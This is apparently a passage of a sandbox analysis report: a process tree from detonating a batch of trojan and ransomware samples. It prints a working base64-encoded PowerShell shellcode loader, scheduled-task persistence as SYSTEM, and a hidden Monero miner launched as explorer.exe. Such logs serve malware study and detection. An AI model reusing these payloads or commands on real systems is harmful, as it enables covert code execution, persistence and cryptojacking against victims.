QAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMAeQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA==6⤵PID:7992
-
C:\Windows\SysWOW64\Windowspowershell\v1.0\powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABSAE8APQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFIAVAA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQAzADEALAB9AGQAMgAsAH0AOAA5ACwAfQBlADUALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA1ADgALAB9ADIAMAAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADUAMAAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAxACwAfQBhADEALAB9AGMAMQAsAH0ANgAzACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA5AGQALAB9ADMAYQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQAYgBZAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABSAE8AIAAtAE4AYQBtAGUAIAAiAHAAYQAiACAALQBuAGEAbQBlAHMAIAB5AFYAQgA7ACQAYgBZAD0AJABiAFkALgByAGUAcABsAGEAYwBlACgAIgB5AFYAQgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AIgArACIAcwAiACsAIgAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABSAFQAIAA9ACAAJABSAFQALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGwAWQBUAFMAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBsAFkAVABTACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJAByAGIAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABSAFQALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJAByAGIAPQAkAFIAVAAuAEwAfQA7ACQAdAB0AD0AJABiAFkAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAFAARAB3ACAAPQAgADAAOwBmAG8AcgAoACQAdABJAD0AMAA7ACQAdABJACAALQBsAGUAKAAkAFIAVAAuAEwAZQBuAGcAdABoAC0AMQApADsAJAB0AEkAKwArACkAewAkAGIAWQA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHQAdAAuAFQAbwBJAG4AdAAzADIAKAApACsAJAB0AEkAKQAsACAAJABSAFQAWwAkAHQASQBdACwAIAAxACkAfQA7ACQAYgBZADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAHQAdAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAFAARAB3ACkAOwAkAGUAcwB5AD0AWwBpAG4AdABdADAAeAAwADAAOwAkAGIAWQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAZQBzAHkALAAkAHQAdAAsADAALAAwACwAMQAtADEAKQA7AA==7⤵
- Command and Scripting Interpreter: PowerShell
PID:8188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\brvisxzj\brvisxzj.cmdline"8⤵PID:7700
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD354.tmp" "c:\Users\Admin\AppData\Local\Temp\brvisxzj\CSC8FC1FDB3708744C8B582BF3EEC2A94FA.TMP"9⤵PID:6776
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exeHEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe3⤵PID:6460
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"4⤵PID:9192
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"4⤵PID:3616
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-7482c58085cf932cf6fe89eb86224a59f3648b7aef2ca5fe6124dea9f75b8273.exeHEUR-Trojan.MSIL.Crypt.gen-7482c58085cf932cf6fe89eb86224a59f3648b7aef2ca5fe6124dea9f75b8273.exe3⤵PID:7284
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:8808
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-8325fd805649d3037ccf0fb384876c211a5a8f78fd43275815aaa4211c0673e8.exeHEUR-Trojan.MSIL.Crypt.gen-8325fd805649d3037ccf0fb384876c211a5a8f78fd43275815aaa4211c0673e8.exe3⤵PID:7208
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-8dffbd1a8ce1ac2c85f5f30161426b23046330b71802f9baef1f845cfdd49917.exeHEUR-Trojan.MSIL.Crypt.gen-8dffbd1a8ce1ac2c85f5f30161426b23046330b71802f9baef1f845cfdd49917.exe3⤵PID:6516
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exeHEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exe3⤵PID:7340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exe:Zone.Identifier"4⤵PID:6168
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-ce41f43578c33bce32bf3eb0bc143abdfbbc21c1feed174765cceece5072b58c.exeHEUR-Trojan.MSIL.Crypt.gen-ce41f43578c33bce32bf3eb0bc143abdfbbc21c1feed174765cceece5072b58c.exe3⤵PID:7436
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d30f8ab0ebfb2693868970788d6b768930935d596795c46e0f917eafed1e583f.exeHEUR-Trojan.MSIL.Crypt.gen-d30f8ab0ebfb2693868970788d6b768930935d596795c46e0f917eafed1e583f.exe3⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 9404⤵
- Program crash
PID:8948
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exeHEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exe3⤵PID:7264
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-d478dbf8fedf4940ffe233ffa6f48a4445f66be0b573764d54965ca020ce120b.exe"{path}"4⤵PID:2716
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exeHEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe3⤵PID:7052
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exeC:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-df2579690ff271d7b427b90831933ccd7d57f7b226b58352632fc00956f7a589.exe4⤵PID:9428
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exeHEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe3⤵PID:7128
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exeC:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe4⤵PID:8484
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exeC:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-fe2f9680afa48295ae0f5a89868d7dd8715654281c07503e44c7db9474577a08.exe4⤵PID:8708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8708 -s 12285⤵
- Program crash
PID:10228
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.vho-ed687cfd5e9412824d9fe7acda9f17323ea1c77d05ed97b4e87d02b8f48ebdcd.exeHEUR-Trojan.MSIL.Crypt.vho-ed687cfd5e9412824d9fe7acda9f17323ea1c77d05ed97b4e87d02b8f48ebdcd.exe3⤵PID:9532
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Cryptos.gen-5914f09546ad6d40a05fb5ed71498ec88279fd420279a6d9a802b1f8ec1b2423.exeHEUR-Trojan.MSIL.Cryptos.gen-5914f09546ad6d40a05fb5ed71498ec88279fd420279a6d9a802b1f8ec1b2423.exe3⤵PID:10040
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit4⤵PID:8704
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"5⤵
- Scheduled Task/Job: Scheduled Task
PID:1620
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:1772
-
-
C:\Users\Admin\Services32.exe"C:\Users\Admin\Services32.exe"4⤵PID:1808
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM" & exit5⤵PID:6808
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\Services32.exe"' /RU "SYSTEM"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5848
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.f2pool.com:13531 --user=enesaltdeneme --pass= --cpu-max-threads-hint=70 --donate-level=5 --cinit-idle-wait=3 --cinit-idle-cpu=90 --cinit-stealth5⤵PID:9524
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exeHEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe3⤵PID:9604
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe"C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d.exe" -a4⤵PID:9168
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-9206ef496f748ac2da75ca61d990666da6427a3344d2873a934b9169fb0df75e.exeHEUR-Trojan.Win32.Crypt.gen-9206ef496f748ac2da75ca61d990666da6427a3344d2873a934b9169fb0df75e.exe3⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS04159D09\setup_install.exe"4⤵PID:7296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_1.exe5⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exesonia_1.exe6⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_1.exe" -a7⤵PID:5248
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_2.exe5⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_2.exesonia_2.exe6⤵PID:9896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9896 -s 3407⤵
- Program crash
PID:3932
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_3.exe5⤵PID:9280
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_3.exesonia_3.exe6⤵PID:6944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 10287⤵
- Program crash
PID:4304
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_4.exe5⤵PID:9696
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_4.exesonia_4.exe6⤵PID:6268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_5.exe5⤵PID:9616
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_5.exesonia_5.exe6⤵PID:9700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_6.exe5⤵PID:9816
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_6.exesonia_6.exe6⤵PID:9044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_7.exe5⤵PID:5724
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_7.exesonia_7.exe6⤵PID:9872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_8.exe5⤵PID:8104
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_8.exesonia_8.exe6⤵PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_9.exe5⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\7zS04159D09\sonia_9.exesonia_9.exe6⤵PID:9372
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 5565⤵
- Program crash
PID:6252
-
-
-
-
C:\Users\Admin\Desktop\00450\HEUR-Trojan.Win32.Crypt.gen-d788913f95cc9cc9b9e7605302edba4376182827de0f4a2d3116542ad1329e14.exeHEUR-Trojan.Win32.Crypt.gen-d788913f95cc9cc9b9e7605302edba4376182827de0f4a2d3116542ad1329e14.exe3⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 2604⤵
- Program crash
PID:5972
-
-
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exeTrojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe3⤵PID:9820
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exeTrojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe4⤵PID:4660
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exeTrojan-Ransom.Win32.Conti.l-03d7abb196ed74114705952db871a6bb3e69d21f655cbd7438f4830f7046402a.exe5⤵PID:4648
-
-
-
-
C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Cryptor.eay-63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be.exeTrojan-Ransom.Win32.Cryptor.eay-63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be.exe3⤵PID:9500
-
-
